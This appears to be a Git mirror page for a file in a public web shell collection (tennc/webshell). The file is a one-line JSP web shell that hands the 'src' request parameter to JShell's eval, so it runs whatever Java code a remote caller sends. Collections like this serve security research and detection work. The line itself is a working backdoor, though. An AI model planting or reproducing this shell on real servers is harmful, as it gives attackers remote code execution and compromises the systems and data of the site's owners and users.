1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
Files
webshell/jsp/p2j.cn/jshell.jsp
2019-10-08 14:46:46 +08:00

2 lines
75 B
Plaintext

<%=jdk.jshell.JShell.builder().build().eval(request.getParameter("src"))%>